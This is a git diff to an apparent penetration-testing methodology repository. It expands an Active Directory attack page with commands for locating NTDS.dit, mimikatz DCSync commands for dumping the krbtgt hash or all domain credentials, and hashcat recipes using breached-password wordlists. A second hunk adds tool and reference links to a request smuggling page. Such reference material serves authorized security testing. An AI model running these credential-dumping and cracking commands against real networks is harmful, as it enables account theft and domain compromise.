diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index eb80a30c..9af421ad 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -539,9 +539,19 @@ New-GPOImmediateTask -TaskName Debugging -GPODisplayName VulnGPO -CommandArgumen ### Dumping AD Domain Credentials You will need the following files to extract the ntds : -- ntds file (C:\Windows\NTDS\ntds.dit) +- NTDS.dit file - SYSTEM hive (C:\Windows\System32\SYSTEM) +Usually you can find the ntds in two locations : `systemroot\NTDS\ntds.dit` and `systemroot\System32\ntds.dit`. +- `systemroot\NTDS\ntds.dit` stores the database that is in use on a domain controller. It contains the values for the domain and a replica of the values for the forest (the Configuration container data). +- `systemroot\System32\ntds.dit` is the distribution copy of the default directory that is used when you install Active Directory on a server running Windows Server 2003 or later to create a domain controller. Because this file is available, you can run the Active Directory Installation Wizard without having to use the server operating system CD. + +However you can change the location to a custom one, you will need to query the registry to get the current location. + +```powershell +reg query HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /v "DSA Database file" +``` + #### Using ndtsutil ```powershell @@ -653,7 +663,11 @@ cme smb 10.10.0.202 -u username -p password --ntds drsuapi #default Any member of Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts are able to run DCSync to pull password data. ```powershell +# DCSync only one user mimikatz# lsadump::dcsync /domain:htb.local /user:krbtgt + +# DCSync all users of the domain +mimikatz# lsadump::dcsync /domain:htb.local /all /csv ``` :warning: Read-Only Domain Controllers are not allowed to pull password data for users by default. @@ -668,6 +682,30 @@ sekurlsa::krbtgt lsadump::lsa /inject /name:krbtgt ``` +#### Crack NTLM hashes with hashcat + +Useful when you want to have the clear text password or when you need to make stats about weak passwords. + +Recommended wordlists: +- rockyou (available in Kali Linux) +- Have I Been Powned (https://hashes.org/download.php?hashlistId=7290&type=hfound) +- Collection #1 (passwords from Data Breaches, might be illegal to possess) + +```powershell +# Basic wordlist +# (-O) will Optimize for 32 characters or less passwords +# (-w 4) will set the workload to "Insane" +$ hashcat64.exe -m 1000 -w 4 -O -a 0 -o pathtopotfile pathtohashes pathtodico -r ./rules/best64.rule --opencl-device-types 1,2 + +# Generate a custom mask based on a wordlist +$ git clone https://github.com/iphelix/pack/blob/master/README +$ python2 statsgen.py ../hashcat.potfile -o hashcat.mask +$ python2 maskgen.py hashcat.mask --targettime 3600 --optindex -q -o hashcat_1H.hcmask +``` + +:warning: If the password is not a confidential data (challenges/ctf), you can use online "cracker" like : +- [hashes.org](https://hashes.org/check.php) +- [hashes.com](https://hashes.com/en/decrypt/hash) ### Password spraying diff --git a/Request Smuggling/README.md b/Request Smuggling/README.md index 845b74f2..d48b4b1a 100644 --- a/Request Smuggling/README.md +++ b/Request Smuggling/README.md @@ -2,11 +2,15 @@ ## Summary +* [Tools](#tools) * [CL.TE vulnerabilities](#cl.te-vulnerabilities) * [TE.CL vulnerabilities](#te.cl-vulnerabilities) * [TE.TE behavior: obfuscating the TE header](#te.te-behavior-obfuscating-the-te-header) * [References](#references) +## Tools + +* [HTTP Request Smuggler / BApp Store](https://portswigger.net/bappstore/aaaa60ef945341e8a450217a54a11646) ## CL.TE vulnerabilities @@ -101,3 +105,4 @@ Challenge: https://portswigger.net/web-security/request-smuggling/lab-ofuscating ## References * [PortSwigger - Request Smuggling](https://portswigger.net/web-security/request-smuggling) +* [A Pentester's Guide to HTTP Request Smuggling - Busra Demir - 2020, October 16](https://blog.cobalt.io/a-pentesters-guide-to-http-request-smuggling-8b7bf0db1f0) \ No newline at end of file